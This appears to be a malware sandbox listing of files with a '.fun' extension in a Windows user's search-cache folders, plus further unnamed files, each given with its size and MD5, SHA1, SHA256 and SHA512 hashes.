SHA256dae6420ea1d7dbe55ab9d32b04270a2b7092a9b6645ed4e87ad2c2da5fdd6bae
SHA512f778cd0256eda2c1d8724a46f82e18ab760221181f75649e49dd32e9a2558bec0e9c52c5306ad17b18ab60395d83c438742103fe9adddf808e40c3d8384ea0b0
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{df4fc690-2383-44d4-99bc-508335a6b53c}\0.2.filtertrie.intermediate.txt.fun
Filesize16B
MD5f405f596786198c6260d9c5c2b057999
SHA1f8f3345eb5abc30606964a460d8eef43d3304076
SHA25658e3090edb9316d9141065ac654a08169f2833091e6eb3a53b5a774a61b7e30a
SHA512a0b3573dae218ade265709a6fdee5f7700c9754eb10747de5af34af340ae95909d0a8902159a735e82eb5d7091f50a7997113661a7ec3fcc2b408fb6c78a4c39
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670754821347503.txt.fun
Filesize55KB
MD5fef51d9bcc19c6f385e6ebfc3ee41966
SHA1fc17c5fa30e60defca14643fe0cd2e03bf09a7f4
SHA2568b06feddc560d7e7df721b92edafc34e17187d498e3449aa35b42df6dd9b3841
SHA51286cd87dc54d291f3cce10c5e625c71dffb9f0a430b57e08fa95ac1b5b13803df284493a3a3012833d8e83c78b6982cf4d336909383fc8aec07753f9e3ea66519
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670762021351650.txt.fun
Filesize63KB
MD546d7cd148444f3c9ff9e88018626771b
SHA14bcf6ec83858b66cf1919b482b19da879d201609
SHA25636d0f96d0150f31586d2ad8551ade1eec10fd76fd0fb8fc8d1f6403d4d8561b2
SHA512b37e98e7243554d18ec0e8e904ac9a425775ce999d43ba4fffbc5f9adf5f644bf9ebb7436b8c249d5eaa948d4e1bc9716ff532ef3b22ce11d785cd9beca075c5
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133672965337604838.txt.fun
Filesize75KB
MD53712dcc646239a72550656e739dc3091
SHA1ba952c111c86ee37d31761c96b2ab65f54dc480c
SHA256c23b5bfbbecaf331517cd8b393293cac2c25a5a4b9814186be2f40addd4f4712
SHA512ed163cfc9993edfb66c8fddcd730885e82e85269a4fd3c830f977bfc02f0b6b30c093165cda27e3670360dc385edf478fcd73cf6fce97a767a124cbacedcf88c
-
Filesize
53B
MD54269dc5ccf1cc290cfeed9a6a2447a75
SHA1c948c6b2c595f8d8de04dd6ea7eb7d3869cb2ddf
SHA25671cb46a518bad900e770ae6ea1e0cda0ce5340ad7eaa69ec22d6c979a33e18bd
SHA512fb698f2ce03961468661addcd7c772e6ea424763f2b32468657e0cb812b2fdad074e216411a5157fd2ae97434efbcefdca87cb3cec0cdfc3dac335acab975fd4
-
Filesize
1KB
MD515f7a3c9e596fd9178c34b2f925ee4f3
SHA1b85178a3338e678c5e3c928bc816824eed349dff
SHA256ef84ef301177d95e9a269cb2dd71ad06b550bde84e09f711a7f41984d82a9a45
SHA512b6d8afc349e7113de57d26b8e76ea8fc74eeef2b6bfedeb248573cfdb5f81089819e49e61d864e03aadf5db9c7a48bb148d46d599b24d007cb65895a6f7eb898
-
Filesize
1KB
MD54d540753a4703bdcff0f16df87ec65ef
SHA1b7140ddcf754cd9d461db82553bfa5a048fd4999
SHA256293e7d21dd7b4e208e399744df6e434c9c2de28a53437a48d3c16c66a8cec547
SHA512020cb386beffc53d387bbf23ac151a63813d7b1dcc4912daebf723aa3fff06671947216723090601c393965bf60fc7acc18df3a9149f3553b05e19f3426afc86
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
1.8MB
MD583b06d6f90f33c512eee102a649279f6
SHA196e5734c6d26b9ae9ed3fc3251e8c56ed9d468db
SHA2561a2fd2bb30f1250cb552cb17839f806602da1559e29adbee5508b6e490306a73
SHA5123404d4a06e75837b4b3b3bc53141e517feca93362e35cb1a18fee8d3799b4ca2e7c4c4a121d535446d05abd09bb9a0eb5577c748db65c544283575e065e64845
-
Filesize
5.5MB
MD55a5dd7cad8028097842b0afef45bfbcf
SHA1e247a2e460687c607253949c52ae2801ff35dc4a
SHA256a811c7516f531f1515d10743ae78004dd627eba0dc2d3bc0d2e033b2722043ce
SHA512e6268e4fad2ce3ef16b68298a57498e16f0262bf3531539ad013a66f72df471569f94c6fcc48154b7c3049a3ad15cbfcbb6345dacb4f4ed7d528c74d589c9858
-
Filesize
1011KB
MD5849959a003fa63c5a42ae87929fcd18b
SHA1d1b80b3265e31a2b5d8d7da6183146bbd5fb791b
SHA2566238cbfe9f57c142b75e153c399c478d492252fda8cb40ee539c2dcb0f2eb232
SHA51264958dabdb94d21b59254c2f074db5d51e914ddbc8437452115dff369b0c134e50462c3fdbbc14b6fa809a6ee19ab2fb83d654061601cc175cddcb7d74778e09
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD58ebcc5ca5ac09a09376801ecdd6f3792
SHA181187142b138e0245d5d0bc511f7c46c30df3e14
SHA256619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650
-
Filesize
1006B
MD54885e1b260d12031943ed7b65fa2fc6e
SHA110def2146a2972034d62a3024bdd3e2056d0d550
SHA256fa928b2ca1d81b9938f3ba4c353cad8a0f8d8769673b92d4264fa544dda18f9a
SHA5120159c9639520d1d22b53d0f9903a6a6d2886a1313df63aa5059541a2d7a736750e3e2a3a6a999a24d3c62bf5db04c93952d357fe2f4b258f1ff8bd37232efbea
-
Filesize
1KB
MD504a27764ceb7b7cea40b07280bd45075
SHA1f0d90c65c82642150c3c9dd1d950e421cc83a5ce
SHA256b47c7f3f74cc85d65911db34d0eac159560c4b01bb6a6e40197d22f866e307db
SHA512ebe9b332a77b3d2e4c61d71353265e821890891283e75bb6f76300138dcd1b73e220207b822b54f75e49dbd96df17f7a06713d27f7d57dfcfe481f839712b4b2
-
Filesize
15.1MB
MD5036d57b60e05d41ccda32ed265549bbe
SHA10aeae6ffc68784acfdd019721361010933ffd29a
SHA256ade5cebf91a53f6f8ef1723e7d6e02b2db15e8a4749fc17335ddf7206e765806
SHA5120586fc064daf9921ffdc6b07759f74bce1eb8c3bd5acbc1683940c43e16b59e97e679a3d1b659ec163aed76b4abb2fa2f84aaa593b7f8f5ce515ef8c85d70abe
-
Filesize
239KB
MD53ad6374a3558149d09d74e6af72344e3
SHA1e7be9f22578027fc0b6ddb94c09b245ee8ce1620
SHA25686a391fe7a237f4f17846c53d71e45820411d1a9a6e0c16f22a11ebc491ff9ff
SHA51221c21b36be200a195bfa648e228c64e52262b06d19d294446b8a544ff1d81f81eb2af74ddbdebc59915168db5dba76d0f0585e83471801d9ee37e59af0620720
-
Filesize
15.1MB
MD5e88a0140466c45348c7b482bb3e103df
SHA1c59741da45f77ed2350c72055c7b3d96afd4bfc1
SHA256bab1853454ca6fdd3acd471254101db1b805b601e309a49ec7b4b1fbcfc47ad7
SHA5122dc9682f4fb6ea520acc505bdbe7671ab7251bf9abd25a5275f0c543a6157d7fa5325b9dce6245e035641ab831d646f0e14f6649f9464f5e97431ab1bf7da431
-
Filesize
1KB
MD5efad5fb5eec0b3599eb6db5a033365f4
SHA12fbff508a6285f68dc01fabef64fab5967a30049
SHA256fcee693753d40069dcd990e17c3c4a65e5130d76b7e8123248ac277f30546d98
SHA512a472ff7757149183e8778ed11abba612635b5c6b24c83ee9d9bd2ae64db665671ee92a911091069636a28ef22c5582365447792ebc0b35b6f8ee93dcd49deb45